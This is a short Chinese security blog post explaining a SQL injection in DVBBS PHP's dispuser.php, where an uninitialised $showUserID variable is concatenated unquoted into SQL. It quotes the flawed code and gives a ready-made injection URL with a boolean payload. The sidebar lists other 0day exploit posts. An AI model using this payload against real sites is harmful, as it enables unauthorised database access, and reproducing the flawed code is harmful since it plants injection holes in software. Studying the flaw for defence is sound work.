dvbbs php 的一个小注入

来源：phpeval's BLOG
作者：phpeval

dispuser.php文件

$UserName = trim($name);                   //这句开始出问题  
if( is_numeric($id) ){  
  $showUserID = intval($id);  
} else{                                     //一个逻辑问题   
  if( $UserName == '' ){  
    $ErrCodes = $lang['UrlArgError'];      //by: phpeval  
  }  
}

没有考虑到，如果id变量不存在且UserName存在的情况，$showUserID就不会被初始化，这样就给直接get或post提交我们自己构造的$showUserID

下面

if( emptyempty($showUserID) ){  
   $updStmt .= " WHERE UserName='{$UserName}' ";  
   $stmt .= " WHERE UserName='{$UserName}' ";  
   $onstat = " WHERE UserName='{$UserName}' ";  
 } else{  
   $updStmt .= " WHERE UserID={$showUserID} ";  
   $stmt .= " WHERE UserID={$showUserID} ";  
   $onstat = " WHERE UserID={$showUserID} ";  
 }  
 if( $query = $db->query($stmt) ){      //注入了

直接

http://www.site.cn/dispuser.php?name=构造用户名&showUserID=1%20and%201=2

猜

dv php的安全性和dv asp 的安全性不在一个档次。

Posted on: 2008, December 28, 11:56 PM | Filed under: 脚本利用 |
Tags：cms

您可能会对以下文章感兴趣哦

ECShop <= v2.6.2 SQL injection 0day (1637)
魅力企业网站管理系统 2009 SP3 中英繁漏洞 (1457)
浅析LxBlog V6变量未初始化漏洞 (1001)
php168 v2008后台拿shell方法 (1472)
phpcms2008 GBK 双字节编码 0day ask/search_ajax.php (1204)
PHPWind 文件及数据结构相关文档 (1533)
远古视频点播系统的一个注入漏洞 (770)
ShopEx 4.7.2 0day (737)
discuz旗下产品 "视频播客 SupeV 1.0.1" 0day (772)
动易SiteWeaver6.6版最新漏洞利用工具 (904)

Sai52's blog实践中求进步

dvbbs php 的一个小注入

您可能会对以下文章感兴趣哦

Leave a comment

Author

Categories

Archive

Blogroll

Meta